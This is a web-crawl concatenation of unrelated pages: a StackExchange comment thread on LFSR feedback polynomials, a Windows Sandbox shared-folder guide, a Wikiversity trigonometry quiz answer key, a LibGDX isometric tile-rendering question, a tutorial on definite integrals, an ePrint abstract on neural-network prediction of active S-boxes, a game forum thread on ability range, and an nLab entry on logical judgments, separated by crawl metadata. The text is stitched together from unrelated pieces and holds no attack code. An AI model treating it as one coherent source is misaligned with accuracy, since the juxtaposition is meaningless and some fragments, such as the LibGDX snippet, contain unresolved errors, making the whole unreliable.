2. You've confused the output bit (the oldest bit in the register) with the feedback bit (the new value that is introduced after shifting)
3. The feedback rule for the polynomial $$x^4+x^3+1$$ is $$s_{i+4}=s_{i+3}\oplus s_{i}$$ and so in your notation would be $$s_4$$ xor $$s_1$$
With this borne in mind the first two rows of you table should read as follows:
s1 s2 s3 s4 feedback bit (s4 xor s1) output bit (s1)
1 0 1 1 0 1
0 1 1 0 0 0...
and so on
• Did you mean feedback bit is s4 xor s3? – hollyjolly Mar 26 at 15:14
• No. The feedback bit is represented by the highest degree monomial in the polynomial (which is $x^4$). The 1 in the polynomial represents the zeroth bit in the register ($s_1$ in your notation) and the $x^3$ represents the bit in position 3 of the register ($s_4$ in your notation). Thus $x^4+x^3+1=0$ is the same as saying $x^4=x^3+1$ which says that the feedback bit is the xor of $s_4$ and $s_1$ in your notation. – Daniel Shiu Mar 26 at 15:18
• Thank you so much! Your explanations are very clear. – hollyjolly Mar 26 at 15:26
• Questions asking for solutions to crypto puzzles or homework exercises are off-topic. While we do accept questions about homework problems, such questions must contain more than just a verbatim copy of the assignment, and should preferably ask for general solving techniques rather than just a solution to a specific puzzle or exercise – kodlu Mar 26 at 20:55
• @hollyjolly: here, the generally appropriate way to thank for an answer is up-voting (up-arrow). And the appropriate way to tell the answer solves the question is accepting it (tick). "Thanks" comments are possible for extraordinarily difficult/long/bright answer, though. – fgrieu Mar 27 at 15:53
|
2021-08-04 02:53:54
|
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 4, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.48090294003486633, "perplexity": 563.3162028791023}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.3, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2021-31/segments/1627046154500.32/warc/CC-MAIN-20210804013942-20210804043942-00250.warc.gz"}
|
https://windowsloop.com/windows-sandbox-shared-folder/
|
# How to Create Shared Folder in Windows Sandbox – Map Folder
With configuration files, you can create shared folder between Windows Sandbox and host OS. Here’re the steps to map folder to Windows Sandbox in Windows 10.
One of the best things in the latest Windows 10 update is the Windows Sandbox. The sandbox allows you to launch full Windows in a virtual environment so that you can test untrusted software or settings before applying them to the actual system. When you close the sandbox, all changes are lost. This keeps the system safe and secure from malicious software and unwanted changes. Compared to alternatives like VMware or VirtualBox, Windows Sandbox is lightweight and easy to use.
You can enable Windows Sandbox from the Windows Features panel. Once enabled, launch it from the Start menu and you are good to go. There is no need for any complicated setup. That being said, being lightweight means a compromise in terms of features. To deal with this Microsoft introduced the Windows Sandbox configuration file. Using the configuration files, you can do a lot of things like adding shared folders, virtual graphics, networking, startup scripts, etc.
For instance, to share files between host and Windows Sandbox, you can create a shared folder in Windows Sandbox. The shared folder gives you greater control over how and which files or data to share.
In this quick guide, let me show the procedure to share a folder with Windows Sandbox in Windows 10.
## Windows Sandbox Shared Folder
These are the steps to follow to create shared folder between Windows Sandbox and Windows 10.
1. Open File Explorer with “Windows Key + E” keyboard shortcut.
2. Go to C drive.
3. Right-click and select “New → Folder” to create a folder.
4. Type “WS Config Files” as the folder name.
5. Open the folder you just created.
6. Right-click and select “New → Text Document” to create a text file.
7. Rename the file to “MappedFolders.wsb“. You can name the file anything you want but it is important that you replace .txt extension with .wsb.
8. Open the WSB file with Notepad. Right-click on the file and select “Open with → Notepad“.
9. Copy the below code and paste it in the Notepad. Replace the dummy folder path with the actual path of the folder you want to share or map.
<Configuration> <MappedFolders> <MappedFolder> <HostFolder>C:\Path\to\Folder</HostFolder> <ReadOnly>false</ReadOnly> </MappedFolder> </MappedFolders></Configuration>
10. If you want the shared folder to be read-only, change the value from false to true on line 5.
11. Save the file with the “Ctrl + S” keyboard shortcut.
13. Now, double-click on the “MappedFolders.wsb” file to launch Windows Sandbox.
14. After launching the sandbox, you will see the shared folder directly on the Desktop.
15. You can open it like any other folder.
Unlike regular Windows, Windows Sandbox mounts the shared folders directly on the desktop. That is the reason why you see the shared folder on the desktop rather than in the Network panel in File Explorer.
You can map multiple folders in Windows Sandbox. All you have to do is duplicate the <MappedFolder> tab in the above code. This is how it looks like when you add multiple shared folders in Windows Sandbox.
<Configuration> <MappedFolders> <MappedFolder> <HostFolder>C:\Path\to\Folder1</HostFolder> <ReadOnly>false</ReadOnly> </MappedFolder> <MappedFolder> <HostFolder>C:\Path\to\Folder2</HostFolder> <ReadOnly>true</ReadOnly> </MappedFolder> <MappedFolder> <HostFolder>C:\Path\to\Folder3</HostFolder> <ReadOnly>false</ReadOnly> </MappedFolder> </MappedFolders></Configuration>
As you can see, all we did was duplicate the MappedFolder tag in the code. You can also set the read-only mode for each mapped folder individually. Alternatively, you can also create multiple configuration files for each shared folder.
Important note: To access the shared folders in Windows Sandbox, you have to launch it using the configuration file. If you launch Windows Sandbox directly from the Start menu, you will not see the shared folders.
## FAQ: Windows Sandbox Mapped Shared Folders
Can I share folders with Windows Sandbox?
Yes. You can share any Windows folder with Windows Sandbox using the configuration files. You can find the steps to create Windows Sandbox Mapped Folder configuration file above.
How to protect Windows Sandbox shared folder?
To protect host folders, you can set the shared folders in read-only mode. When in read-only mode, Windows Sandbox cannot write or change data in the shared folder.
Can I share multiple folders with Windows Sandbox?
Yes. Using the same configuration file, you can map multiple folders. Instructions on how you can do it can be found above.
I hope that helps. If you are stuck or need some help, comment below and I will try to help as much as possible.
Scroll to Top
|
2022-10-04 00:50:32
|
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.5363263487815857, "perplexity": 4810.2660130759095}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337446.8/warc/CC-MAIN-20221003231906-20221004021906-00046.warc.gz"}
|
https://en.wikiversity.org/wiki/Introduction_to_Calculus/Quiz_1/Answers
|
If you can pass this quiz, you are ready to take this course
1. Evaluate ${\displaystyle \tan(\theta )\,\ }$ in terms of ${\displaystyle \sin(\theta )\,\ }$
${\displaystyle \tan(\theta )=\sin(\theta )/{\sqrt {(}}1-(\sin ^{2}(\theta ))\,\ }$
Shyam (T/C)
2. If ${\displaystyle \csc(\theta )=1/x,\,\ }$ then what does ${\displaystyle x\,\ }$ equal?
${\displaystyle x=\sin(\theta )\,\ }$ where ${\displaystyle x=[-1,1]\,\ }$
Shyam (T/C)
3. Prove ${\displaystyle \tan ^{2}(\theta )+1=\sec ^{2}(\theta )\,\ }$using ${\displaystyle \,\ \sin ^{2}(\theta )+\cos ^{2}(\theta )=1}$
${\displaystyle \sin ^{2}(\theta )+cos^{2}(\theta )=1\,\ }$
divide both sides by ${\displaystyle \cos ^{2}(\theta )=>\sin ^{2}(\theta )/cos^{2}(\theta )+1=1/cos^{2}(\theta )\,\ }$
${\displaystyle =>\tan ^{2}(\theta )+1=sec^{2}(\theta )\,\ }$
Shyam (T/C)
4. ${\displaystyle \cos(A+B)=\cos(A)\cos(B)-\sin(A)\sin(B)\,\ }$
• Find the double angle idenities for the cosine function using the above rule.
replace ${\displaystyle B\,\ }$ by ${\displaystyle A=>\cos(A+A)=\cos(A)\cos(A)-\sin(A)\sin(A)\,\ }$
${\displaystyle =>\cos(2A)=\cos ^{2}(A)-\sin ^{2}(A)\,\ }$
Shyam (T/C)
• Find the half angle idenities from the double angle idenities.
${\displaystyle =>\cos(2A)=\cos ^{2}(A)-\sin ^{2}(A)\,\ }$
replace ${\displaystyle A\,\ }$ by ${\displaystyle A/2=>\cos(A)=2\cos ^{2}(A/2)-1\,\ }$ using ${\displaystyle \sin ^{2}(A)+\cos ^{2}(A)=1\,\ }$
Shyam (T/C)
• Find the value of ${\displaystyle \,\ \cos ^{2}(\theta )}$ without exponents using the above rules
${\displaystyle =>\cos(2\theta )=2\cos ^{2}(\theta )-1\,\ }$
${\displaystyle =>\cos ^{2}(\theta )=(1+\cos(2\theta ))/2\,\ }$
Shyam (T/C)
• (Challenge) Find the value of ${\displaystyle \,\ \cos ^{3}(\theta )}$ without exponents
${\displaystyle \cos(3\theta )=cos(\theta +2\theta )\,\ }$
${\displaystyle =>\cos(3\theta )=cos(\theta )\cos(2\theta )-sin(\theta )\sin(2\theta )\,\ }$
${\displaystyle =>\cos(3\theta )=cos(\theta )(2\cos ^{2}(\theta )-1)-sin(\theta )(2\sin(\theta )\cos(\theta ))\,\ }$ using ${\displaystyle \cos(2\theta )=2\cos ^{2}(\theta )-1\,\ }$ and ${\displaystyle \sin(2\theta )=2\sin(\theta )\cos(\theta )\,\ }$
${\displaystyle =>\cos(3\theta )=cos(\theta )((2\cos ^{2}(\theta )-1)-2sin^{2}(\theta ))\,\ }$
${\displaystyle =>\cos(3\theta )=cos(\theta )(4\cos ^{2}(\theta )-3)\,\ }$ using ${\displaystyle \,\ \sin ^{2}(\theta )+\cos ^{2}(\theta )=1}$
${\displaystyle =>4\cos ^{3}(\theta )=cos(3\theta )+3cos(\theta )\,\ }$
${\displaystyle =>\cos ^{3}(\theta )=(cos(3\theta )+3cos(\theta ))/4\,\ }$
Shyam (T/C) 19:42, 18 November 2006 (UTC)
|
2021-04-13 01:28:02
|
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 34, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.7885249853134155, "perplexity": 3464.471971261631}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2021-17/segments/1618038071212.27/warc/CC-MAIN-20210413000853-20210413030853-00180.warc.gz"}
|
https://gamedev.stackexchange.com/questions/151940/tile-rendering-problem-in-libgdx
|
# Tile rendering problem in LibGDX
I'm making an isometric game using a Tiled map with libgdx. As I want my character to be rendered before or after the tiles depending his positions, I create an ArrayList<Renderable> and I add in it my character and the tiles.
TiledMapTileLayer midlayer = (TiledMapTileLayer) map.getLayers().get(4); //The layer containing my tiles.
int width = midlayer.getWidth();
int height = midlayer.getHeight();
ArrayList<Renderable> renderables = new ArrayList<Renderable>();
renderables.add(character); //Adding the character in the list;
//We add to the list every midlayer's tile, so we can later sort
for (int i=0;i<width;i++) {
for (int j=0;j<height;j++) {
if (midlayer.getCell(i, j)!=null) { //As the cell can or can't exist in that position.
}
}
RenderableTile is a class I created containing a x and y position and the TextureRegion.
public class RenderableTile implements Renderable, Comparable<Renderable> {
private int x;
private int y;
private TextureRegion texture;
public RenderableTile(TextureRegion text, int x, int y) {
this.x = x;
this.y = y;
this.texture = texture;
}
@Override
public void render(SpriteBatch batch, BitmapFont font) {
batch.begin();
int rX = Translations.TransX(x, y); //Transformation orthogonal position to isometric rendering
int rY = Translations.TransY(x, y)-15;
batch.draw(text, rX, rY);
batch.end();
}
The sorting works perfectly, and the ArrayList seems containing the right tiles. But when I render I get this:
Instead of something like this:
This is really akward, when I try to render a single tile in a specific point it works normally.
Maybe there is an alternative solution?
|
2020-10-28 00:08:59
|
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.17887787520885468, "perplexity": 14627.669877266359}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.3, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2020-45/segments/1603107894890.32/warc/CC-MAIN-20201027225224-20201028015224-00601.warc.gz"}
|
https://articles.outlier.org/how-to-do-definite-integrals
|
Calculus
# Definite Integrals: What Are They and How to Calculate Them
## Rachel McLean
Subject Matter Expert
Knowing how to find definite integrals is an essential skill in calculus. In this article, we’ll learn the definition of definite integrals, how to evaluate definite integrals, and practice with some examples.
## Defining Definite Integrals
What is a definite integral? Definite integrals are used to calculate the area between a curve and the x-axis on a specific interval. (If you need to review, see our beginner's guide to integrals).
If we want to evaluate the definite integral of a real-valued function $f$ with respect to $x$ on the interval [a, b], where $a$ and $b$ are real numbers and $a \leq b$, we use the following notation:
$\int_{a}^{b} f(x)dx = A$
In this notation, the curved integral sign $\int$ indicates the operation of taking an integral. The rest of this notation is composed of three parts:
• The integrand $f(x)$
• The integral bounds $a$ and $b$, where $a$ is the lower bound and $b$ is the upper bound. These are also referred to as limits.
• The differential $dx$, which tells us that we are integrating $f$ with respect to the variable $x$.
Altogether, this notation represents the area enclosed by $f(x)$, the x-axis, and the lines $x=a$ and $x=b$. Graphically, we can visualize $\int_{a}^{b} f(x)dx$ as something like this:
## Definite Integrals vs. Indefinite Integrals
Before we learn exactly how to solve definite integrals, it’s important to understand the difference between definite and indefinite integrals.
Definite integrals find the area between a function’s curve and the x-axis on a specific interval, while indefinite integrals find the antiderivative of a function. Finding the indefinite integral and finding the definite integral are operations that output different things.
Calculating the indefinite integral takes in one function, and outputs another function: the antiderivative function of $f(x)$, notated by $F(x)$.
This output function is accompanied by an arbitrary constant C and does not involve lower and upper boundaries. By contrast, calculating the definite integral always outputs a real number, which represents the area under the curve on a specific interval. You can see the difference in their notations below:
• The indefinite integral $\int f(x)dx = F(x) + C$
• The definite integral $\int_{a}^{b} f(x)dx = A$, for some real number A.
Given $f(x)$, the indefinite integral answers the question, “What function, when differentiated, gives us $f(x)$?” The indefinite integral gives us a family of functions $F$ since infinite functions will satisfy this question. Thus, the indefinite integral gives us an “indefinite” answer. The definite integral gives us a real number — a unique “definite” answer.
You can learn more about the difference with this lesson sample on indefinite integrals by one of our instructors Dr. Hannah Fry.
## How to Calculate Definite Integrals
To find the definite integral of a function, we can use the Fundamental Theorem of Calculus, which states: If $f$ is continuous and $F$ is an antiderivative of $f$, then $\int_{a}^{b} f(x)dx = [F(x)]^b_a = F(b) - F(a)$.
This means that to find the definite integral of a function on the interval [a, b], we simply take the difference between the indefinite integral of the function evaluated at $a$ and the indefinite integral of the function evaluated at $b$.
We can break this process down into four steps:
1. Find the indefinite integral $F(x)$. You can use the Rules of Integration that you learned with indefinite integrals to help with this part.
2. Find $F(b)$. This is found by plugging the upper bound $b$ into the indefinite integral found in Step 1.
3. Find $F(a)$. This is found by plugging the lower bound $a$ into the indefinite integral found in Step 1.
4. Take the difference $F(b) - F(a)$.
Let’s do one example together. Let’s calculate the definite integral of the function $f(x) = 4x^3-2x$ on the interval [1, 2].
We'll follow the four steps given above.
Step 1:
$\int (4x^3-2x) dx = x^4 - x^2 = F(x)$
Step 2:
$F(2) = 2^4-2^2 = 16-4 = 12$
Step 3:
$F(1) = 1^4-1^2 = 1-1 = 0$
Step 4:
$F(2)-F(1) = 12 - 0 = 12$
Thus, $\int_{1}^{2} (4x^3-2x) dx = 12$.
## Properties of Definite Integrals and Key Equations
Let’s review some of the key properties of definite integrals. These will be useful for solving more complex integral problems. In the following properties, assume that $f$ and $g$ are continuous functions, and let $k$ be a constant.
### Zero-Length Interval Rule
When a=b, the interval has length 0, and so the definite integral definite integral of a function on [a, b] is 0.
$\int_{a}^{a} f(x)dx = 0$
### Reverse Bounds Rule
To find the definite integral of a function on [a, b] where $a > b$, we can simply reverse the sign of $\int_{b}^{a} f(x)dx$.
$\int_{a}^{b} f(x)dx = -\int_{b}^{a} f(x)dx$
If $a$, $b$, and $c$ are real numbers on a closed interval, then $\int_{a}^{c} f(x)dx$ can be found by adding integrals as follows:
$\int_{a}^{c} f(x)dx = \int_{a}^{b} f(x)dx + \int_{b}^{c} f(x)dx$
### Constant Multiplier Rule
You can pull constants outside of an integral.
$\int_{a}^{b} kf(x)dx = k\int_{a}^{b} f(x)dx$
### Sum and Difference Rule
The integral of the sum or difference of two functions is the sum or difference of their integrals.
$\int_{a}^{b} [f(x) \pm g(x)]dx = \int_{a}^{b} f(x)dx \pm \int_{a}^{b} g(x)dx$
### Integral of a Constant Rule
The integral of a constant over [a, b] is equal to the constant multiplied by the difference $b-a$.
$\int_{a}^{b} kdx = k(b-a)$
### Comparison Properties of Definite Integrals
• If $f(x) \geq 0$ on [a, b], then $\int_{a}^{b} f(x)dx \geq 0$.
• If $f(x) \leq 0$ on [a, b], then $\int_{a}^{b} f(x)dx \leq 0$.
• If $f(x) \geq g(x)$ on [a, b], then $\int_{a}^{b} f(x)dx \geq \int_{a}^{b} g(x)dx$.
### Average Value of a Function
The average value of a function on [a, b] is defined by:
$f_{avg}=\frac{1}{b-a}\int_{a}^{b} f(x)dx=\frac{F(b)-F(a)}{b-a}$
### The Mean Value Theorem
This theorem tells us that there’s at least one point c inside the open interval (a,b) at which $f(c)$ will be equal to the average value of the function over [a, b]. That is, there exists a $c$ on (a, b) such that:
$f(c) = \frac{1}{b-a}\int_{a}^{b} f(x)dx$
or equivalently
$f(c)(b-a) = \int_{a}^{b} f(x)dx$
## 3 Practice Exercises and Solutions
Here are three exercises for you to practice how to do a definite integral and their solutions.
### Exercise 1
Calculate the definite integral of the function $f(x) = \cos{(x)}$ on the interval $[0, \frac{\pi}{2}]$.
### Solution:
$\int_{0}^{\frac{\pi}{2}} \cos{(x)}dx = [\sin{(x)}]^{\frac{\pi}{2}}_0$
$= \sin{(\frac{\pi}{2})} - \sin{(0)}$
$= 1 - 0$
$=1$
### Exercise 2
Determine the average value of $f(x) = 12x^2-2x$ on $[2, 4]$.
### Solution:
$f_{avg}=\frac{1}{4-2}\int_{2}^{4} (12x^2-2x)dx$
$=\frac{1}{2}\left[\frac{12x^3}{3}-\frac{2x^2}{2}\right]^4_2$
$=\frac{1}{2}\left[4x^3-x^2\right]^4_2$
$=\frac{1}{2}((4 \cdot 4^3-4^2)-(4 \cdot 2^3-2^2))$
$=\frac{1}{2}((256-16)-(32-4))$
$=\frac{1}{2}(240-28)$
$=\frac{1}{2}(212)$
$=106$
### Exercise 3
Given that $\int_{3}^{10} f(x)dx = 17$ and $\int_{7}^{10} f(x)dx=9$, evaluate $\int_{3}^{7} f(x)dx$.
### Solution:
$\int_{3}^{10} f(x)dx = \int_{3}^{7} f(x)dx + \int_{7}^{10} f(x)dx$
$\int_{3}^{7} f(x)dx = \int_{3}^{10} f(x)dx - \int_{7}^{10} f(x)dx$
$\int_{3}^{7} f(x)dx = 17 - 9$
$\int_{3}^{7} f(x)dx = 8$
### Explore Outlier's Award-Winning For-Credit Courses
Outlier (from the co-founder of MasterClass) has brought together some of the world's best instructors, game designers, and filmmakers to create the future of online college.
Check out these related courses:
Explore course
Explore course
Explore course
|
2022-09-29 07:09:51
|
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 94, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.9252854585647583, "perplexity": 286.15125286055905}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335326.48/warc/CC-MAIN-20220929065206-20220929095206-00025.warc.gz"}
|
https://eprint.iacr.org/2021/066
|
## Cryptology ePrint Archive: Report 2021/066
A Deep Learning Approach for Active S-box Prediction of Lightweight Generalized Feistel Block Ciphers
Mohamed Fadl Idris and Je Sen Teh and Jasy Liew Suet Yan and Wei-Zhu Yeoh
Abstract: Block cipher resistance against differential cryptanalysis is commonly assessed by counting the number of active substitution boxes (S-boxes) using search algorithms or mathematical solvers that incur high computational costs. In this paper, we propose an alternative approach using deep neural networks to predict the number of active S-boxes, trading off exactness for real-time efficiency as the bulk of computational work is brought over to pre-processing (training). Active S-box prediction is framed as a regression task whereby neural networks are trained using features such as input and output differences, number of rounds, and permutation pattern. We first investigate the feasibility of the proposed approach by applying it on a reduced (4-branch) generalized Feistel structure (GFS) cipher. Apart from optimizing a neural network architecture for the task, we also explore the impact of each feature and its representation on prediction error. We then extend the idea to 64-bit GFS ciphers by first training neural networks using data from five different ciphers before using them to predict the number of active S-boxes for TWINE, a lightweight block cipher. The best performing model achieved the lowest root mean square error of 1.62 and R$^2$ of 0.87, depicting the feasibility of the proposed approach.
Category / Keywords: secret-key cryptography / Active s-boxes, block cipher, cryptanalysis, deep learning, differential cryptanalysis, lightweight cryptography, neural networks, TWINE
Date: received 17 Jan 2021, last revised 13 May 2021
Contact author: jesen_teh at usm my
Available format(s): PDF | BibTeX Citation
Note: This paper is currently not under consideration for publication in any journal at the moment of uploading the latest version of the preprint.
Short URL: ia.cr/2021/066
[ Cryptology ePrint archive ]
|
2021-06-19 02:29:20
|
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.5889617204666138, "perplexity": 3050.814670999726}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2021-25/segments/1623487643380.40/warc/CC-MAIN-20210619020602-20210619050602-00378.warc.gz"}
|
https://forum.albiononline.com/index.php/Thread/140919-New-Axe-Q-jump-range-is-not-9m/?postID=1095127&s=2bea3226a2364b68292c4c63acc679513e7b5d07
|
• # New Axe Q jump range is not 9m
I tested this alongside the daggers 8m dash and it fell short, so it seems to be actually 6m or 7m instead of 9m as intended
• True. I just tested it. The range should be 9m, but it´s more about 6-7m.
It can easily be tested with royal shoes, for their jump is 9m and you can clearly see there is clearly a distance.
This ability hits at 9m i suppose, but character jumps to around 6-7m
here it can be clearly seen if you compare Q on axes and F on shoes.
Also, this is similar with avalonian axe, but even worse. Ava axe says range 10m, though it doesnt say leap 10m - just range 10m. So it hits to 10m for sure, but the character moves almost the same distance as new axe Q, maybe even less than the new Q.
I suppose it has something to deal with the particular animation on these abilities, since animations are both pretty much the same
If it says 9m, should be 9m - not 6-7m
The post was edited 2 times, last by Borbarad ().
|
2021-01-28 08:10:59
|
{"extraction_info": {"found_math": false, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.8287070393562317, "perplexity": 2380.680927406359}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 20, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2021-04/segments/1610704839214.97/warc/CC-MAIN-20210128071759-20210128101759-00696.warc.gz"}
|
http://ncatlab.org/nlab/show/judgment
|
# nLab judgment
foundations
## Foundational axioms
foundational axiom
# Judgments
## Idea
In formal logic, a judgment, or judgement, is a “meta-proposition”; that is, a proposition belonging to the meta-language (the deductive system or logical framework) rather than to the object language.
More specifically, any deductive system includes, as part of its specification, which strings of symbols are to be regarded as the judgments. Some of these symbols may themselves express a proposition in the object language, but this is not necessarily the case.
The interest in judgements is typically in how they may arise as theorems, or as consequences of other judgements, by way of the deduction rules in a deductive system. One writes
$\vdash J$
to mean that $J$ is a judgment that is derivable, i.e. a theorem of the deductive system.
## Examples
### In first-order logic
In first-order logic, a paradigmatic example of a judgement is the judgement that a certain string of symbols is a well-formed proposition. This is often written as “$P \;prop$”, where $P$ is a metavariable? standing for a string of symbols that denotes a proposition.
Another example of a judgement is the judgement that these symbols form a proposition proved to be true. This judgment is often written as “$P\;true$”.
Neither of these judgements is the same thing as the proposition $P$ itself. In particular, the proposition is a statement in the logic, while the judgement that the proposition is a proposition, or is provably true, is a statement about the logic. However, often people abuse notation and conflate a proposition with the judgment that it is true, writing $P$ instead of than $P\;true$.
### In type theory
The distinction between judgements and propositions is particularly important in intensional type theory.
The paradigmatic example of a judgment in type theory is a typing judgment. The assertion that a term $t$ has type $A$ (written “$t:A$”) is not a statement in the type theory (that is, not something which one could apply logical operators to in the type-theoretic system) but a statement about the type theory.
Often, type theories include only a particular small set of judgments, such as:
• typing judgments (written $t:A$, as above)
• judgments of typehood (usually written $A \;type$)
• judgments of equality between typed terms (written say $(t=t'):A$)
(In a type theory with a type of types, judgments of typehood can sometimes be incorporated as a special case of typing judgments, writing $A:Type$ instead of $A\;type$.)
These limited sets of judgments are often defined inductively by giving type formation/term introduction/term elimination- and computation rules (see natural deduction) that specify under what hypotheses one is allowed to conclude the given judgment.
These inductive definitions can be formalized by choosing a particular type theory to be the meta-language; usually a very simple type theory suffices (such as a dependent type theory with only dependent product types). Such a meta-type-theory is often called a logical framework.
## Hypothetical and generic judgments
It may happen that a judgment $J$ is only derivable under the assumptions of certain other judgments $J_1,\dots, J_2$. In this case one writes
$J_1,\dots,J_n \;\vdash J.$
Often, however, it is convenient to incorporate hypotheticality into judgments themselves, so that $J_1,\dots,J_n \;\vdash J$ becomes a single hypothetical judgment. It can then be a consquence of other judgments, or (more importantly) a hypothesis used in concluding other judgments. For instance, in order to conclude the truth of an implication $\phi\Rightarrow\psi$, we must conclude $\psi$ assuming $\phi$; thus the introduction rule for implication is
$\frac{\phi \;\vdash\; \psi}{\vdash\; \phi\Rightarrow\psi}$
with a hypothetical judgment as its hypothesis. See natural deduction for a more extensive discussion.
In a type theory, we may also conside the case where the hypotheses $J_1$ are typing judgments of the form $x:A$, where $x$ is a variable, and in which the conclusion judgment $J$ involves these variables as free variables. For instance, $J$ could be $\phi\;prop$, where $\phi$ is a valid (well-formed) proposition only when $x$ belongs of a specific type $X$. In this case we have a generic judgement, written
$(x \colon X) \;\vdash\; (\phi \; prop).$
which expresses that assuming the hypothesis or antecedent judgement that $x$ is of type $X$, as a consequence we have the succedent judgement that $\phi$ is a proposition. If on the right here we have a typing judgment
$(x \colon X) \;\vdash\; (t \colon A)$
we have a term in context.
